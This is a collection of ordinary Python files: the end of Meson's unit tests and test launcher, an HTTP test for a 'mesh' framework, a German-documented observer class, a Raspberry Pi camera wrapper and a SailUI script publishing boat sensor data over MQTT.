events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, num_tests=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, num_tests=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, num_tests=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, num_tests=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, num_tests=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, num_tests=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, num_tests=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, num_tests=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, num_tests=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, num_tests=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
class SubprojectsCommandTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.root_dir = Path(self.builddir)
self.project_dir = self.root_dir / 'src'
self._create_project(self.project_dir)
self.subprojects_dir = self.project_dir / 'subprojects'
os.makedirs(str(self.subprojects_dir))
def _create_project(self, path, project_name='dummy'):
os.makedirs(str(path), exist_ok=True)
with open(str(path / 'meson.build'), 'w') as f:
f.write("project('{}')".format(project_name))
def _git(self, cmd, workdir):
return git(cmd, str(workdir), check=True)[1].strip()
def _git_config(self, workdir):
self._git(['config', 'user.name', 'Meson Test'], workdir)
self._git(['config', 'user.email', 'meson.test@example.com'], workdir)
def _git_remote(self, cmd, name):
return self._git(cmd, self.root_dir / name)
def _git_local(self, cmd, name):
return self._git(cmd, self.subprojects_dir / name)
def _git_local_branch(self, name):
        # Same as `git branch --show-current` but compatible with older git versions
branch = self._git_local(['rev-parse', '--abbrev-ref', 'HEAD'], name)
return branch if branch != 'HEAD' else ''
def _git_local_commit(self, name, ref='HEAD'):
return self._git_local(['rev-parse', ref], name)
def _git_remote_commit(self, name, ref='HEAD'):
return self._git_remote(['rev-parse', ref], name)
def _git_create_repo(self, path):
# If a user has git configuration init.defaultBranch set we want to override that
with tempfile.TemporaryDirectory() as d:
out = git(['--version'], str(d))[1]
if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'):
extra_cmd = ['--initial-branch', 'master']
else:
extra_cmd = []
self._create_project(path)
self._git(['init'] + extra_cmd, path)
self._git_config(path)
self._git(['add', '.'], path)
self._git(['commit', '-m', 'Initial commit'], path)
def _git_create_remote_repo(self, name):
self._git_create_repo(self.root_dir / name)
def _git_create_local_repo(self, name):
self._git_create_repo(self.subprojects_dir / name)
def _git_create_remote_commit(self, name, branch):
self._git_remote(['checkout', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)
def _git_create_remote_branch(self, name, branch):
self._git_remote(['checkout', '-b', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)
def _git_create_remote_tag(self, name, tag):
self._git_remote(['commit', '--allow-empty', '-m', 'tag {} commit'.format(tag)], name)
self._git_remote(['tag', tag], name)
def _wrap_create_git(self, name, revision='master'):
path = self.root_dir / name
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-git]
url={}
revision={}
'''.format(os.path.abspath(str(path)), revision)))
def _wrap_create_file(self, name, tarball='dummy.tar.gz'):
path = self.root_dir / tarball
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-file]
source_url={}
'''.format(os.path.abspath(str(path)))))
def _subprojects_cmd(self, args):
return self._run(self.meson_command + ['subprojects'] + args, workdir=str(self.project_dir))
def test_git_update(self):
subp_name = 'sub1'
# Create a fake remote git repository and a wrap file. Checks that
# "meson subprojects download" works.
self._git_create_remote_repo(subp_name)
self._wrap_create_git(subp_name)
self._subprojects_cmd(['download'])
self.assertPathExists(str(self.subprojects_dir / subp_name))
self._git_config(self.subprojects_dir / subp_name)
# Create a new remote branch and update the wrap file. Checks that
# "meson subprojects update --reset" checkout the new branch.
self._git_create_remote_branch(subp_name, 'newbranch')
self._wrap_create_git(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
        # Update remote newbranch. Checks that the new commit is pulled into the
        # existing local newbranch. Make sure it does not print a spurious 'git stash' message.
self._git_create_remote_commit(subp_name, 'newbranch')
out = self._subprojects_cmd(['update', '--reset'])
self.assertNotIn('No local changes to save', out)
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch and switch to another branch. Checks that it
        # switches the current branch to newbranch and pulls the latest commit.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Stage some local changes then update. Checks that local changes got
# stashed.
self._create_project(self.subprojects_dir / subp_name, 'new_project_name')
self._git_local(['add', '.'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
self.assertTrue(self._git_local(['stash', 'list'], subp_name))
# Create a new remote tag and update the wrap file. Checks that
# "meson subprojects update --reset" checkout the new tag in detached mode.
self._git_create_remote_tag(subp_name, 'newtag')
self._wrap_create_git(subp_name, 'newtag')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newtag'))
# Create a new remote commit and update the wrap file with the commit id.
# Checks that "meson subprojects update --reset" checkout the new commit
# in detached mode.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
new_commit = self._git_remote(['rev-parse', 'HEAD'], subp_name)
self._wrap_create_git(subp_name, new_commit)
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), new_commit)
# Create a local project not in a git repository, then update it with
        # a git wrap. Without --reset it should print an error message and return
        # failure. With --reset it should delete the existing project and clone the
# new project.
subp_name = 'sub2'
self._create_project(self.subprojects_dir / subp_name)
self._git_create_remote_repo(subp_name)
self._wrap_create_git(subp_name)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self._subprojects_cmd(['update'])
self.assertIn('Not a git repository', cm.exception.output)
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name))
@skipIfNoExecutable('true')
def test_foreach(self):
self._create_project(self.subprojects_dir / 'sub_file')
self._wrap_create_file('sub_file')
self._git_create_local_repo('sub_git')
self._wrap_create_git('sub_git')
self._git_create_local_repo('sub_git_no_wrap')
def ran_in(s):
ret = []
prefix = 'Executing command in '
for l in s.splitlines():
if l.startswith(prefix):
ret.append(l[len(prefix):])
return sorted(ret)
dummy_cmd = ['true']
out = self._subprojects_cmd(['foreach'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git', 'subprojects/sub_git_no_wrap']))
out = self._subprojects_cmd(['foreach', '--types', 'git,file'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git']))
out = self._subprojects_cmd(['foreach', '--types', 'file'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_file'])
out = self._subprojects_cmd(['foreach', '--types', 'git'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_git'])
def _clang_at_least(compiler: 'Compiler', minver: str, apple_minver: T.Optional[str]) -> bool:
"""
    Check that the Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
        AppleClang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
if apple_minver is None:
return False
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.CFLAGS_MAPPING.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
if arg in ('-f', '--failfast'):
arg = '--exitfirst'
pytest_args.append(arg)
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
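# For example, convert_args(['ClassName.test_name']) returns
# ['-k', 'ClassName and test_name'], and convert_args(['--failfast'])
# returns ['--exitfirst'] (class and test names are illustrative).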
def running_single_tests(argv, cases):
'''
Check whether we only got arguments for running individual tests, not
entire testcases, and not all testcases (no test args).
'''
got_test_arg = False
for arg in argv:
if arg.startswith('-'):
continue
for case in cases:
if not arg.startswith(case):
continue
if '.' not in arg:
# Got a testcase, done
return False
got_test_arg = True
return got_test_arg
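# For example, with the `cases` list defined in main() below (test names are
# illustrative):
#   running_single_tests(['AllPlatformTests.test_foo'], cases) -> True
#   running_single_tests(['AllPlatformTests'], cases)          -> False (a whole testcase)
#   running_single_tests(['-v'], cases)                        -> False (no test args)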
def main():
unset_envs()
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests', 'SubprojectsCommandTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = []
# Don't use pytest-xdist when running single unit tests since it wastes
# time spawning a lot of processes to distribute tests to in that case.
if not running_single_tests(sys.argv, cases):
pytest_args += ['-n', 'auto']
pytest_args += ['./run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# Fallback to plain unittest.
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
start = time.monotonic()
try:
raise SystemExit(main())
finally:
print('Total time: {:.3f} seconds'.format(time.monotonic() - start))
|
test_http.py
|
import os
import sys
import time
from threading import Thread
from unittest2 import TestCase
from wsgiref.simple_server import make_server
try:
import json
except ImportError:
import simplejson as json
from mesh.standard import *
from mesh.transport.http import *
from fixtures import *
server = HttpServer([primary_bundle, secondary_bundle])
def http(method, data=None, resource='example', mimetype=None, **params):
path = params.pop('path', None)
if not path:
bundle = params.pop('bundle', 'primary')
version = params.pop('version', (1, 0))
path = '/%s/%d.%d/%s' % (bundle, version[0], version[1], resource)
if mimetype is None:
if method == GET:
mimetype = URLENCODED
elif data:
mimetype = JSON
return server.dispatch(method, path, mimetype, {}, params, data)
class TestHttpServer(TestCase):
def setUp(self):
storage.reset()
def test_not_found(self):
for attempt in ('/primary/1.0/wrong', '/primary/10.0/example', '/wrong/1.0/example'):
response = http(GET, path=attempt)
self.assertEqual(response.status, NOT_FOUND)
def test_json_request(self):
data = {'required_field': 'text'}
response = http(POST, json.dumps(data))
self.assertEqual(response.status, OK)
content = json.loads(response.content[0])
self.assertIsInstance(content, dict)
self.assertIn('id', content)
self.assertIsInstance(content['id'], int)
def test_standard_requests(self):
response = http(POST, json.dumps({}))
self.assertEqual(response.status, INVALID)
response = http(POST, json.dumps({'required_field': 'text'}))
self.assertEqual(response.status, OK)
content = json.loads(response.content[0])
self.assertIsInstance(content, dict)
self.assertIn('id', content)
id = content['id']
self.assertIsInstance(id, int)
response = http(GET, resource='example/%d' % id)
self.assertEqual(response.status, OK)
self.assertEqual(json.loads(response.content[0]), {'id': id, 'required_field': 'text', 'default_field': 1})
response = http(POST, json.dumps({'default_field': 3}), resource='example/%d' % id)
self.assertEqual(response.status, OK)
self.assertEqual(json.loads(response.content[0]), {'id': id})
response = http(GET, 'exclude=[required_field]', resource='example/%d' % id)
self.assertEqual(response.status, OK)
self.assertEqual(json.loads(response.content[0]), {'id': id, 'default_field': 3})
response = http(DELETE, resource='example/%d' % id)
self.assertEqual(response.status, OK)
self.assertEqual(json.loads(response.content[0]), {'id': id})
response = http(GET, resource='example/%d' % id)
self.assertEqual(response.status, GONE)
class _TestHttpClient(TestCase):
@classmethod
def setUpClass(cls):
r, w = os.pipe()
pid = os.fork()
if pid:
cls.shutdown_pipe = w
time.sleep(2)
else:
server = make_server('localhost', 8888, wsgi_server)
thread = Thread(target=server.serve_forever)
thread.start()
os.read(r, 1)
server.shutdown()
thread.join()
os._exit(0)
@classmethod
def tearDownClass(cls):
os.write(cls.shutdown_pipe, '0')
def setUp(self):
storage.reset()
def test_standard_requests(self):
client = HttpClient('localhost:8888', primary_bundle.specify((1, 0)))
#response = client.execute('example', 'create', data={})
response = client.execute('example', 'create', data={'required_field': 'text'})
        print(response)
|
observable.py
|
import queue, threading
class Observable:
"""
Basisklasse für Objekte, die mit dem Observer-Pattern überwacht werden könnnen.
Kann entweder von einer Klasse geerbt werden, damit diese das Observer-Pattern
realisiert oder als eigenständiges Objekt verwendet werden, um einen zentralen
Event-Broker zu erhalten.
"""
def __init__(self, use_event_thread=False):
"""
Konstruktor.
@param: use_event_thread: Separaten Thread verwenden, in dem die Callbacks
ausgeführt werden, statt sie im selben Thread auszuführen, das ein
Ereignis auslöst.
"""
self._event_listeners = {}
self._event_queue = None
self._event_thread = None
if use_event_thread:
self._event_queue = queue.SimpleQueue()
self._event_thread = threading.Thread(target=self._event_thread_main)
self._event_thread.start()
def add_event_listener(self, event, callback):
"""
Registrieren einer weiteren Callback-Funktion für ein Ereignis. Diese wird
zusammen mit den anderen Callback-Funktionen aufgerufen, sobald das überwachte
Objekt das Ereignis auslöst.
Folgende Signatur muss die Callbackfunktion haben:
funktion(event, *args, **kwargs)
@param event: Name des Ereignisses
@param callback: Callback-Funktion
"""
        if event not in self._event_listeners:
self._event_listeners[event] = []
self._event_listeners[event].append(callback)
def remove_event_listener(self, event, callback):
"""
Deregistrierung einer Callback-Funktion.
@param event: Name des Ereignisses
@param callback: Callback-Funktion
"""
if event in self._event_listeners and callback in self._event_listeners[event]:
self._event_listeners[event].remove(callback)
def raise_event(self, event, *args, **kwargs):
"""
Methode zum Auslösen eines Ereignisses. Als erster Parameter muss der Name des
Ereignisses übergeben werden. Danach können beliebige weitere Parameter folgen,
die unverändert an die Callback-Funktionen weitergegeben werden.
Es gilt zu beachten, dass die Callback-Funktionen im selben Thread laufen,
der das Ereignis auslöst.
@param event: Name des Ereignisses
@param *args: Beliebige Positionsparameter gemäß Python-Konventionen
@param **kwargs: Beliebige Namensparameter gemäß Python-Konventionen
"""
        if event not in self._event_listeners:
return
if self._event_queue:
            # Put the event into the queue for the event thread
self._event_queue.put({
"type": "event",
"event": event,
"args": args,
"kwargs": kwargs,
})
else:
            # Execute the callbacks directly in the calling thread
for callback in self._event_listeners[event]:
callback(*args, **kwargs)
def close(self):
"""
Event Thread beenden, sobald alle anstehenden Ereignisse abgearbeitet wurden.
Bewirkt nichts, wenn dem Konstruktor `use_event_thread = False` mitgegeben wurde.
"""
if self._event_queue:
self._event_queue.put({"type": "close"})
def join_thread(self):
"""
Den Aufrufer so lange blockieren, wie der Event Thread läuft.
"""
if self._event_thread:
self._event_thread.join()
def _event_thread_main(self):
"""
Hauptmethode des Event Threads, in dem die Callbacks ausgeführt werden, wenn dem
Konstruktor der Parameter `use_event_thread = True` mitgegeben wurde.
"""
running = True
while running:
command = self._event_queue.get()
if command["type"] == "event":
                # Execute the callbacks for an event
for callback in self._event_listeners[command["event"]]:
callback(*command["args"], **command["kwargs"])
elif command["type"] == "close":
                # Stop the event thread and process no further events
running = False
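# Minimal usage sketch: a broker running its own event thread with a single
# listener. The event name "tick" and the printing callback are arbitrary
# illustrative choices.
if __name__ == "__main__":
    def print_tick(count):
        print("tick", count)
    broker = Observable(use_event_thread=True)
    broker.add_event_listener("tick", print_tick)
    for i in range(3):
        broker.raise_event("tick", i)
    broker.close()        # stop the event thread once the queue is drained
    broker.join_thread()  # wait for the event thread to exit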
|
camera.py
|
from threading import Thread
import time
import io
from logging import getLogger
from picamera import PiCamera # pylint: disable=import-error
class Camera():
"""Wrapper class for Pi camera"""
TIMEOUT = 5
PICTURE_FORMAT = 'jpeg'
DEFAULT_RESOLUTION = '1280x720'
def __init__(self, register: object):
self.log = getLogger(self.__class__.__name__)
        self.log.info('Initializing class')
self.register = register
self.frame = None
self.thread = None
self.last_access = 0
self.__name = None
@property
def name(self):
return self.__name.upper()
def change_settings(self, name=None):
if name is not None:
self.__name = name
self.register()
def _start_recording(self):
self.last_access = time.time()
if self.thread is None:
self.log.debug("No thread active, creating new thread")
self.thread = Thread(target=self._thread)
self.log.debug("Starting new thread")
self.thread.start()
self.log.debug("Waiting for camera to start")
while self.frame is None:
time.sleep(0)
def _thread(self):
with PiCamera(resolution=self.DEFAULT_RESOLUTION, framerate=12) as pi_camera:
self.log.info('Camera thread: Starting camera stream')
pi_camera.start_preview()
time.sleep(1)
stream = io.BytesIO()
for _ in pi_camera.capture_continuous(stream, self.PICTURE_FORMAT, use_video_port=True):
stream.seek(0)
self.frame = stream.read()
stream.seek(0)
stream.truncate()
if time.time() - self.last_access > self.TIMEOUT:
self.log.info('Camera thread: Closing camera stream')
break
self.thread = None
def get_frame(self) -> bytes:
"""Returns the latest picture from the camera stream.
Returns:
bytes: Returns the last picture in bytes. Format of picture is "jpeg"
"""
self._start_recording()
return self.frame
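# Minimal usage sketch, assuming a Raspberry Pi with the camera module attached;
# `register` may be any callable (a no-op lambda here). get_frame() lazily starts
# the capture thread and returns the most recent JPEG-encoded frame.
if __name__ == '__main__':
    cam = Camera(register=lambda: None)
    with open('frame.jpg', 'wb') as out:
        out.write(cam.get_frame())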
|
sailui_publish_sensors.py
|
# encoding: utf8
"""
SailUI - GPS data from serial port parsed and send to InfluxDB
MIT License
Copyright (c) 2021 HadrienLG
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# Generic/Built-in
import datetime
import serial
import time
import os
import sys
import threading
from subprocess import check_call
import logging
import paho.mqtt.client as mqtt
# Sensors
from libs.AD import ADS1015 # Gain amplifier
from libs.ICM20948 import ICM20948 # Gyroscope
from libs.LPS22HB import LPS22HB # Pressure, temperature
from libs.TCS34725 import TCS34725 # Colors
#from libs.SHTC3 import SHTC3 # Temperature, humidity
import busio
import board
import adafruit_shtc3
# Owned
__author__ = "HadrienLG"
__copyright__ = "Copyright 2021, SailUI"
__credits__ = ["HadrienLG", "ChrisBiau",]
__license__ = "MIT"
__version__ = "0.3.0"
__maintainer__ = "HadrienLG"
__email__ = "hadrien.lg@wanadoo.fr"
__status__ = "OnGoing"
__influence__ = {'Waveshare Sense HAT': 'https://www.waveshare.com/wiki/Sense_HAT_(B)'}
# Logging
logging.basicConfig(filename='sailui_publish_sensors.log', level=logging.DEBUG)
logging.info('Démarrage de SailUI-Publish sensors, début de journalisation')
user_signal = True # global flag for the main loop
axes = ['x','y','z']
def thread_gyro(threadstop, mqttclient, gyro):
while True:
# Gyroscope
gyro.icm20948update()
        roll, pitch, yaw = gyro.Roll, gyro.Pitch, gyro.Yaw
        acceleration = gyro.Acceleration
        gyroscope = gyro.Gyroscope
        magnetic = gyro.Magnetic
message = '[GYROSCOPE]\n' + \
'Roll = {:.2f}, Pitch = {:.2f}, Yaw = {:.2f}\n'.format(roll, pitch, yaw) + \
'Acceleration: X = {}, Y = {}, Z = {}\n'.format(acceleration[0], acceleration[1], acceleration[2]) + \
'Gyroscope: X = {}, Y = {}, Z = {}\n'.format(gyroscope[0], gyroscope[1], gyroscope[2]) + \
'Magnetic: X = {}, Y = {}, Z = {}'.format(magnetic[0], magnetic[1], magnetic[2])
logging.debug(message)
# MQTT
for ax in zip(['roll', 'pitch', 'yaw'], [roll, pitch, yaw]):
result = mqttclient.publish(f'gyro/{ax[0]}',ax[1]) # result: [code, message_id]
if result[0] != 0:
logging.exception(f"Gyroscope, échec de l'envoi du message roll/pich/yaw au broker")
for field in zip(['acceleration', 'gyroscope', 'magnetic'], [acceleration, gyroscope, magnetic]):
for ax in range(0,3):
result = mqttclient.publish(f'gyro/{field[0]}/{axes[ax]}',field[1][ax]) # result: [code, message_id]
if result[0] != 0:
logging.exception(f"Gyroscope, échec de l'envoi du message au broker")
if not threadstop():
logging.info('Arrêt du thread Gyroscope')
print('Arrêt du thread Gyroscope',threadstop())
break
def thread_baro(threadstop, mqttclient, baro):
while True:
time.sleep(5)
# Baromètre
baro.update()
pression, temperature = baro.PRESS_DATA, baro.TEMP_DATA
logging.debug('[BAROMETRE] Pressure = {:6.2f} hPa , Temperature = {:6.2f} °C'.format(pression, temperature) )
# MQTT
result = mqttclient.publish(f'baro/pression',pression) # result: [code, message_id]
if result[0] != 0:
logging.exception(f"Barometre, échec de l'envoi du message pression au broker")
result = mqttclient.publish(f'baro/temperature', temperature) # result: [code, message_id]
if result[0] != 0:
logging.exception(f"Barometre, échec de l'envoi du message temperature au broker")
if not threadstop():
logging.info('Arrêt du thread Barometre')
print('Arrêt du thread Barometre',threadstop())
break
def thread_therm(threadstop, mqttclient, therm):
while True:
time.sleep(1)
# Thermomètre
temperature, humidite = therm.measurements
logging.debug('[THERMOMETRE] Temperature = {:6.2f}°C , Humidity = {:6.2f}%%'.format(temperature, humidite) )
# MQTT
result = mqttclient.publish(f'therm/temperature',temperature) # result: [code, message_id]
if result[0] != 0:
logging.exception(f"Thermometre, échec de l'envoi du message temperature au broker")
result = mqttclient.publish(f'therm/humidite', humidite) # result: [code, message_id]
if result[0] != 0:
logging.exception(f"Thermometre, échec de l'envoi du message au broker")
if not threadstop():
logging.info('Arrêt du thread Thermometre')
print('Arrêt du thread Thermometre',threadstop())
break
# [MQTT] The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
if rc == 0:
logging.info('Connected to MQTT broker successfully!')
else:
logging.warning("Connected with result code "+mqtt.connack_string(rc))
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
client.subscribe("$SYS/#")
# [MQTT] The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
#print(msg.topic+" "+str(msg.payload))
pass
# [MQTT] The callback for when a PUBLISH message is send to the server.
def on_publish(mosq, obj, mid):
#print("Publish mid: " + str(mid))
pass
